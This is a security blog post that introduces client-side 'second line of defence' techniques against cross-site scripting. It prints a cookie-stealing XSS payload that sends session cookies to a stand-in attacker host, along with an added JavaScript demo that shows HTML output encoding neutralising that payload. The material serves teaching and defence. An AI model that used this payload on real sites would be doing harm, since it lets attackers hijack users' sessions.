Driven by our secure software development activities, we will publish a series of articles on second line of defence web application security techniques, starting with this article.
This added complexity not only makes it harder to secure web applications, but also introduces new vulnerabilities that need to be considered.
Because it is so hard to properly secure web applications, we have to deal with the fact that there will be vulnerabilities on the server side. Therefore, security experts, browser vendors and web standards committees have started introducing more client-side defenses. These defenses do not replace secure development practices in the server-side code; they complement the server-side defenses as a second line of defense, so that even if a web application contains a vulnerability, the browser may be able to prevent its exploitation.
It is sometimes hard to keep up with these new additional defenses. We will publish blog posts each describing one or two of these defensive mechanisms that will help to additionally secure modern web applications.
Web vulnerabilities like SQL injection still affect a lot of web applications, but the server-side mitigation techniques for them are well known and manageable. One type of vulnerability, however, seems to be especially hard to mitigate: Cross-Site Scripting (XSS) (https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)).
A typical XSS attack targets the session cookie. If an attacker is able to steal the session cookie, he is in possession of the session ID and can impersonate the user by taking over his session. A simple payload that achieves this is:
<script>document.write("<img src='http://attacker.example.com/" + escape(document.cookie) + "' />")</script>
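To show what the first line of defense looks like for the payload above, here is an added example that is not part of the original post: the same payload is rendered once by a naive template that concatenates untrusted input straight into the HTML (vulnerable) and once through an HTML entity encoder (hardened). The helper names (htmlEncode, renderVulnerable, renderHardened, containsScriptTag) and the sample "comment" input are assumptions made for this illustration; the encoder covers the HTML text context only, which is exactly why such server-side defenses are hard to get right everywhere and why a second line of defense matters.

```javascript
// Added example, not code from the original post.
// Demonstrates why HTML output encoding on the server side neutralises a
// reflected/stored XSS payload before the browser ever executes it.

// Constructed sample input: the cookie-stealing payload discussed in the post.
const XSS_PAYLOAD =
  '<script>document.write("<img src=\'http://attacker.example.com/" + escape(document.cookie) + "\' />")</script>';

// Entity-encode the five characters that can switch the HTML parser out of
// text context. This is sufficient for the HTML text context only; attribute,
// JavaScript, CSS and URL contexts need their own encoders.
function htmlEncode(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering (hypothetical): untrusted input is concatenated into the page as-is.
function renderVulnerable(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Hardened rendering (hypothetical): same template, but the value is encoded
// for the HTML text context it is placed in.
function renderHardened(comment) {
  return `<p class="comment">${htmlEncode(comment)}</p>`;
}

// Crude detection check used only for this demonstration: does the rendered
// HTML still contain a script start tag that a browser would execute?
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Stand-alone run: compare the two renderings.
console.log('vulnerable executes script:', containsScriptTag(renderVulnerable(XSS_PAYLOAD)));
console.log('hardened executes script:  ', containsScriptTag(renderHardened(XSS_PAYLOAD)));
console.log(renderHardened(XSS_PAYLOAD));
```

Run with node; the vulnerable rendering still carries an executable script tag, while the hardened rendering shows the payload as harmless text.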
This is only a very basic defense, which protects only against the simplest and most common attacks. If the attacker uses a more sophisticated payload, he can easily impersonate the user without stealing the session cookie at all, solely via the XSS payload, e.g. by circumventing cross-site request forgery (CSRF) protections.
Stay tuned to learn about additional second line of defense mechanisms!
Michael Rodler, Limes Security